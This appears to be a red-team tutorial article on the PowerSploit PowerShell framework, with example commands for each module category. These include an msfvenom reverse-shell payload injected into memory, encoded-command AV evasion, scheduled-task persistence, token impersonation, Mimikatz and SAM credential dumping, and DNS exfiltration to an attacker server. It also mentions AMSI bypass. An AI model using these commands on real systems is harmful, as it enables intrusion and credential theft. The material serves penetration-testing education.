⚠️ Note: PowerSploit is no longer actively maintained and many of its modules are easily detected by modern EDR and antivirus solutions. It remains a valuable tool for learning and experimentation but may require customization or obfuscation to be usable in real-world red team engagements.
Greetings, fellow red teamers and penetration testers! In today’s highly interconnected world, offensive security has evolved significantly. With new tools and techniques appearing regularly, staying ahead of the curve is essential. One powerful framework that continues to hold educational value is PowerSploit—a collection of PowerShell modules for offensive security operations.
In this article, we’ll dive into PowerSploit, explore its capabilities, and provide real-world examples to help you sharpen your offensive tradecraft. Let’s get into it.
What is PowerSploit?
PowerSploit is an open-source project developed by security researchers and enthusiasts. It’s a collection of PowerShell scripts and modules designed to support red teamers and penetration testers in post-exploitation, privilege escalation, persistence, and recon tasks. Its strength lies in flexibility and ease of use in Windows environments—especially where PowerShell is already present.
While the tool is aging and not stealthy out-of-the-box, it remains useful for learning offensive PowerShell concepts and testing detection capabilities.
Setting up PowerSploit
To get started with PowerSploit:
Clone the GitHub repository:
git clone https://github.com/PowerShellMafia/PowerSploit.git
Import the desired module in PowerShell:
cd PowerSploit Import-Module .\Exfiltration\Invoke-Mimikatz.ps1
💡 You can also download and import individual scripts from the GitHub repo if you prefer not to clone the full project.
PowerSploit Modules
PowerSploit is divided into six main module categories:
- Code Execution
- Script Modification
- Persistence
- Privilege Escalation
- Reconnaissance
- Exfiltration
Let’s look at each category in detail.
🧨 Code Execution
These modules allow you to execute arbitrary code on a target system.
Invoke-Shellcode
: Injects shellcode into memory.Invoke-DllInjection
: Injects a DLL into a running process.Invoke-ReflectivePEInjection
: Reflectively loads PE files into memory (DLL/EXE), avoiding disk writes.
Example: Deploying a Reverse Shell
Generate shellcode using msfvenom
:
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.10 LPORT=443 -f powershell
Then execute it:
Invoke-Shellcode -Shellcode 'YOUR_GENERATED_SHELLCODE' -Force
⚠️ Shellcode execution via PowerShell is easily detected by modern EDR tools. This is best used for learning or in controlled labs.
🧪 Script Modification
These modules help evade AV and execution policies.
Out-EncodedCommand
: Encodes a command forpowershell.exe -EncodedCommand
.Out-CompressedDll
: Compresses DLLs for use with reflective loaders.
Example: Encoded Execution
$command = 'Get-Process'
$encodedCommand = Out-EncodedCommand -Command $command
powershell.exe -EncodedCommand $encodedCommand
⚠️ EncodedCommand is a well-known bypass and flagged in most environments. This example is for educational purposes only.
🛡️ Persistence
Maintain access after initial compromise.
New-UserPersistenceOption
: User-level persistence (startup folder, registry).New-ElevatedPersistenceOption
: System-level persistence (services, scheduled tasks).
Example: Daily Scheduled Task
New-UserPersistenceOption -Command "powershell.exe -Command 'YOUR_PAYLOAD_COMMAND'" -Frequency Daily -At "12:00"
🚩 Privilege Escalation
Gain higher privileges on a compromised host.
Invoke-TokenManipulation
: Lists and impersonates access tokens.PowerUp
: Scans for common privilege escalation opportunities.
Example: Token Impersonation
First, enumerate impersonation candidates:
Invoke-TokenManipulation -Enumerate
Then impersonate a token:
Invoke-TokenManipulation -Impersonate
🎯 There is no
-Username
parameter. The module impersonates based on available tokens.
🕵️ Reconnaissance
Gather info about the environment.
Get-NetUser
: Lists domain users.Get-NetComputer
: Lists computers in the domain.Get-NetShare
: Lists shared folders.
Example: Enumerate Domain Users
Get-NetUser -Filter *
📤 Exfiltration
Extract data stealthily.
Invoke-Mimikatz
: Extracts credentials from memory.Invoke-PowerDump
: Dumps local SAM password hashes.Out-DnsTxt
: Exfiltrates data via DNS TXT records.
Example: DNS Exfiltration
Out-DnsTxt -Data "SENSITIVE_DATA" -DnsServer "YOUR_DNS_SERVER"
🛑 EDRs will often block or detect this activity unless heavily obfuscated or tunneled.
Real-World Use Cases
Here are a few situations where PowerSploit can be integrated into a red team workflow:
🔒 Privilege Escalation via Tokens
Invoke-TokenManipulation -Enumerate
Invoke-TokenManipulation -Impersonate
Use after initial compromise to move laterally or elevate privileges.
🕸️ Lateral Movement with PowerShell Remoting
Get-NetComputer -Filter *
Enter-PSSession -ComputerName "TARGET_COMPUTER"
Requires PSRemoting to be enabled and accessible.
🧬 Credential Dumping with Mimikatz
Invoke-Mimikatz
⚠️ Detected instantly in modern environments. Use AMSI bypass or load via obfuscated stager if testing defenses.
Final Thoughts
PowerSploit remains one of the most instructive frameworks for understanding offensive PowerShell. While its techniques are dated in some areas, its modular approach and code clarity make it an outstanding training and testing resource.
For real-world operations, expect to modify, obfuscate, and combine PowerSploit modules with custom tradecraft or C2 frameworks like Empire, Covenant, or Cobalt Strike.
Explore, adapt, and test—always in a legal and ethical environment.
Stay sharp out there, and good hunting.